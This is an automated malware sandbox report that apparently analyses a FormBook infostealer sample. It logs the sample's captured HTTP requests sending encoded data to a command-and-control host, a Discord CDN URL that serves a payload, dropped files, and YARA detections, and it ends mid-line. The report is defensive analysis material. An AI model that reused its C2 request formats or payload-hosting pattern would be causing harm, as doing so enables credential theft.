33 37 73 76 32 6e 48 78 7a 35 76 4c 34 46 45 77 70 38 4a 37 34 78 74 6d 62 6d 6b 57 4c 63 69 69 54 73 42 43 50 64 47 46 34 67 56 41 58 50 4f 62 37 7a 55 49 54 5a 79 49 71 75 38 30 68 79 63 36 64 68 48 77 62 50 45 78 68 41 66 4b 43 38 4a 76 30 55 4b 69 4b 75 65 38 55 53 79 49 65 63 79 34 61 69 51 65 64 6b 5a 6f 50 66 63 64 73 56 31 52 66 57 6b 6c 47 4f 62 66 45 53 65 71 5a 65 77 48 65 63 4e 70 6a 63 42 78 47 72 66 46 78 71 6b 45 66 48 49 50 6d 4c 77 32 57 35 51 31 46 4b 36 36 7e 39 49 55 52 46 4a 4f 32 57 4c 32 4a 62 33 38 62 4e 67 72 63 69 49 73 32 62 33 47 77 46 6
 Downloads files from webservers via HTTP Show sources
 Source: global traffic HTTP traffic detected: GET /oav/?k0GdCl1=OGiTtEl8oZpE8Sv3fxvazbyjtykFcfSLP9Tv9n1IDimktFHXuVh+PBX3cY6ZEpQG1B1V&tZU4=NX1pk HTTP/1.1Host: www.mybabyshop4you.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /oav/ HTTP/1.1Host: www.mybabyshop4you.comConnection: closeContent-Length: 717Cache-Control: no-cacheOrigin: http://www.mybabyshop4you.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mybabyshop4you.com/oav/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6b 30 47 64 43 6c 31 3d 47 6b 75 70 7a 68 42 47 6b 49 41 36 75 52 6d 52 4f 55 75 63 71 66 47 31 39 67 67 75 64 5f 32 68 4e 37 57 54 35 68 42 4e 47 54 61 65 73 55 47 4b 72 48 49 4a 4d 78 4b 6f 66 34 4b 57 5a 4a 51 33 35 44 51 5a 7e 6f 46 49 30 56 67 64 70 69 4d 77 6d 55 59 57 47 37 6a 5a 53 6d 30 75 4d 4b 68 64 30 49 30 65 63 61 67 41 4d 78 31 58 39 33 5a 65 79 70 50 69 37 4c 44 41 5a 41 7a 41 37 69 55 43 52 46 76 51 77 54 69 46 73 73 56 54 68 70 53 36 36 79 6b 79 53 55 54 41 6e 50 6b 66 75 77 4a 78 72 79 31 6b 6c 6a 56 6a 49 50 33 37 72 62 46 58 7e 52 54 52 64 73 4c 6d 77 31 53 4d 61 55 58 47 37 7a 55 68 5a 31 47 36 43 74 41 57 73 62 6a 34 46 58 65 54 55 69 41 51 65 49 71 48 64 4f 28 77 67 6a 28 78 6f 53 4a 61 46 44 57 61 32 38 39 49 74 36 45 64 4c 65 33 36 48 63 41 43 37 79 4b 6f 75 44 7a 4a 57 70 68 61 31 34 52 73 47 4e 69 4b 74 6f 51 47 33 77 46 51 58 71 53 6f 65 34 5a 41 55 58 69 74 33 7a 53 5f 42 49 55 7a 52 67 6f 74 56 47 6f 4c 56 76 6d 34 76 72 73 79 79 77 32 4c 64 66 34 34 4d 44 37 69 67 74 63 64 34 34 63 65 35 55 64 32 4d 4e 72 78 5a 4c 38 78 58 62 74 4f 51 48 4a 50 74 43 39 36 71 6b 48 31 4a 62 4a 62 51 37 5a 46 58 39 70 46 57 6d 71 4f 78 35 69 6b 47 41 58 58 6a 76 5a 63 48 53 73 5a 5a 42 6e 6a 68 39 36 4a 41 34 6b 74 76 68 55 5f 53 6a 78 4d 52 33 52 65 4c 52 77 50 4b 4e 42 64 71 53 59 64 6a 36 31 6f 47 37 39 4e 41 33 6b 71 6f 32 65 41 70 48 72 73 53 56 49 42 75 37 39 76 79 7a 44 52 51 4f 55 6a 79 66 53 2d 32 75 49 51 32 4a 55 50 5a 5f 28 65 6c 62 54 65 63 2d 4e 75 76 44 37 72 50 56 6b 62 51 44 28 6f 53 52 34 4a 45 5f 53 64 44 45 6f 50 74 48 6d 35 76 38 4c 44 4e 39 30 68 46 69 6d 62 31 70 4c 36 37 58 70 2d 75 4b 69 31 6a 4e 6c 42 66 44 6a 36 31 46 34 30 28 36 6f 4c 45 36 6c 5a 70 72 56 2d 57 38 37 45 34 6c 32 5f 38 47 39 76 6b 6d 5a 4d 57 48 51 34 66 51 39 75 76 42 44 67 53 31 56 72 61 35 4c 31 61 35 57 6e 33 73 6e 63 78 7a 41 5a 7a 38 4e 6c 73 62 38 53 30 58 43 4d 43 48 39 54 50 4f 66 53 63 64 70 69 30 49 35 43 6a 49 7e 35 76 50 72 47 42 4c 43 35 7a 5a 4c 52 6b 35 72 41 36 4d 53 41 4b 54 76 36 72 76 38 49 56 6a 5a 5f 65 73 39 34 71 46 47 57 68 56 44 57 71 54 6d 64 58 33 79 5f 4c 31 78 2d 42 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: k0GdCl1=GkupzhBGkIA6uRmROUucqfG19ggud_2hN7WT5hBNGTaesUGKrHIJMxKof4KWZJQ35DQZ~oFI0VgdpiMwmUYWG7jZSm0uMKhd0I0ecagAMx1X93ZeypPi7LDAZAzA7iUCRFvQwTiFssVThpS66ykySUTAnPkfuwJxry1kljVjIP37rbFX~RTRdsLmw1SMaUXG7zUhZ1G6CtAWsbj4FXeTUiAQeIqHdO(wgj(xoSJaFDWa289It6EdLe36HcAC7yKouDzJWpha14RsGNiKtoQG3wFQXqSoe4ZAUXit3zS_BIUzRgotVGoLVvm4vrsyyw2Ldf44MD7igtcd44ce5Ud2MNrxZL8xXbtOQHJPtC96qkH1JbJbQ7ZFX9pFWmqOx5ikGAXXjv
 Urls found in memory or binary data Show sources
 Source: Ijxlcmh_Signed_.exe String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q Source: Ijxlcmh_Signed_.exe String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t Source: explorer.exe, 00000004.00000000.324899208.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 Source: Ijxlcmh_Signed_.exe String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0 Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com Source: Ijxlcmh_Signed_.exe String found in binary or memory: http://ocsp.comodoca.com0 Source: Ijxlcmh_Signed_.exe String found in binary or memory: http://ocsp.thawte.com0 Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icog Source: Ijxlcmh_Signed_.exe String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0 Source: Ijxlcmh_Signed_.exe String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0( Source: Ijxlcmh_Signed_.exe String found in binary or memory: http://ts-ocsp.ws.symantec.com07 Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/? Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8 Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers? Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpLMEM Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpZ3 Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/ocid=iehpK; Source: NETSTAT.EXE, 00000011.00000002.496313834.0000000003439000.00000004.00000001.sdmp String found in binary or memory: http://www.mybabyshop4you.com Source: NETSTAT.EXE, 00000011.00000002.496313834.0000000003439000.00000004.00000001.sdmp String found in binary or memory: http://www.mybabyshop4you.com/oav/ Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn Source: Ijxldrv.exe, 00000007.00000002.322506056.00000000034A0000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attac0 Source: Ijxldrv.exe, 00000007.00000002.322506056.00000000034A0000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/720370823554138118/766538674925862932/Ijxlvnm Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/ Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png4_ Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
 Uses HTTPS Show sources
 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732 Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000C.00000002.347301102.0000000010411000.00000020.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.489865505.0000000000610000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.399200553.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.255722131.0000000010411000.00000020.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.490058063.0000000000640000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000002.367185514.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.488550629.00000000001C0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.401382635.0000000010410000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000C.00000002.347219785.0000000003E40000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.333441854.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.352439392.0000000010410000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000002.372602980.0000000010410000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.399815412.00000000049D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000007.00000002.324932466.0000000003D3C000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.333947953.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000013.00000002.366016750.0000000003060000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000017.00000002.400259752.0000000000A30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.254839755.0000000003F16000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000007.00000002.324842296.0000000003D00000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000C.00000002.347253674.0000000003E7C000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 2.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 18.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 7.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE Source: Yara match File source: 12.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE Source: Yara match File source: 18.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 2.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Dropped file: C:\Users\user\AppData\Roaming\4201TS0U\420logri.ini Jump to dropped file Source: C:\Windows\SysWOW64\NETSTAT.EXE Dropped file: C:\Users\user\AppData\Roaming\4201TS0U\420logrv.ini Jump to dropped file
 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000C.00000002.347301102.0000000010411000.00000020.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000C.00000002.347301102.0000000010411000.00000020.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000011.00000002.489865505.0000000000610000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000011.00000002.489865505.0000000000610000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000002.00000002.399200553.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000002.00000002.399200553.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.255722131.0000000010411000.00000020.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.255722131.0000000010411000.00000020.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000011.00000002.490058063.0000000000640000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000011.00000002.490058063.0000000000640000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000012.00000002.367185514.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000012.00000002.367185514.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000011.00000002.488550629.00000000001C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000011.00000002.488550629.00000000001C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000002.00000002.401382635.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000002.00000002.401382635.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000C.00000002.347219785.0000000003E40000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000C.00000002.347219785.0000000003E40000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.333441854.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.333441854.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.352439392.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.352439392.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000012.00000002.372602980.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000012.00000002.372602980.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000002.00000002.399815412.00000000049D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000002.00000002.399815412.00000000049D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000007.00000002.324932466.0000000003D3C000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000007.00000002.324932466.0000000003D3C000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.333947953.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.333947953.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000013.00000002.366016750.0000000003060000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000013.00000002.366016750.0000000003060000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000017.00000002.400259752.0000000000A30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000017.00000002.400259752.0000000000A30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.254839755.0000000003F16000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.254839755.0000000003F16000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000007.00000002.324842296.0000000003D00000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000007.00000002.324842296.0000000003D00000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000C.00000002.347253674.0000000003E7C000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000C.00000002.347253674.0000000003E7C000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 2.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 2.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 18.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 18.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 7.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 7.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 12.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 12.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 18.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 18.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 2.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 2.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 15.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 15.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 15.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 15.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Contains functionality to call native functions Show sources
 Detected potential crypto function Show sources
 Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 0_3_02239291 0_3_02239291 Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 0_3_02238690 0_3_02238690 Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 0_3_02238698 0_3_02238698 Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 0_3_02243D9C 0_3_02243D9C Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 0_3_0222B340 0_3_0222B340 Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 0_3_0222B348 0_3_0222B348 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04CFD466 2_2_04CFD466 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04C4841F 2_2_04C4841F Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D025DD 2_2_04D025DD Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04C4D5E0 2_2_04C4D5E0 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D01D55 2_2_04D01D55 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D02D07 2_2_04D02D07 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04C30D20 2_2_04C30D20 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D02EF7 2_2_04D02EF7 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04CFD616 2_2_04CFD616 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04C56E30 2_2_04C56E30 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D01FF1 2_2_04D01FF1 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D028EC 2_2_04D028EC Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04C4B090 2_2_04C4B090 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04C620A0 2_2_04C620A0 Source: C:\Program Files 